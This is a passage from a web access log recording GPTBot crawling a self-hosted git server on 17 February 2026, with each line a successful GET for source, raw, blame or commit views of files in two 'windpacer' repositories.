-[17/Feb/2026:13:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13868] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" -[17/Feb/2026:13:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.patch" [Client 74.7.227.38] [Length 211699100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" -[17/Feb/2026:13:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" -[17/Feb/2026:13:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" -[17/Feb/2026:13:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10466] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" -[17/Feb/2026:13:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10827] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 74.7.227.38] [Length 11579] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13651] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" -[17/Feb/2026:13:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13651] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" -[17/Feb/2026:13:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" -[17/Feb/2026:13:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13649] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" -[17/Feb/2026:13:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" -[17/Feb/2026:13:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" -[17/Feb/2026:13:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" -[17/Feb/2026:13:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" -[17/Feb/2026:13:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" -[17/Feb/2026:13:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" -[17/Feb/2026:13:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" -[17/Feb/2026:13:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 74.7.227.38] [Length 10761] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" -[17/Feb/2026:13:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" -[17/Feb/2026:13:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9848] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" -[17/Feb/2026:13:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42172] [Gzip 12.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11687] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" -[17/Feb/2026:13:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11710] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" -[17/Feb/2026:13:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11711] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" -[17/Feb/2026:13:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11712] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" -[17/Feb/2026:13:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11703] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" -[17/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx" [Client 74.7.227.38] [Length 10141] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx" -[17/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" [Client 74.7.227.38] [Length 12578] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12175] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10332] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project" -[17/Feb/2026:13:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10515] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" -[17/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10503] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" -[17/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" [Client 74.7.227.38] [Length 10529] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" [Client 74.7.227.38] [Length 13571] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" -[17/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" -[17/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 74.7.227.38] [Length 16081] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 74.7.227.38] [Length 12956] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 10940] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" -[17/Feb/2026:13:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12178] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 74.7.227.38] [Length 11108] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 74.7.227.38] [Length 12522] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 74.7.227.38] [Length 12845] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 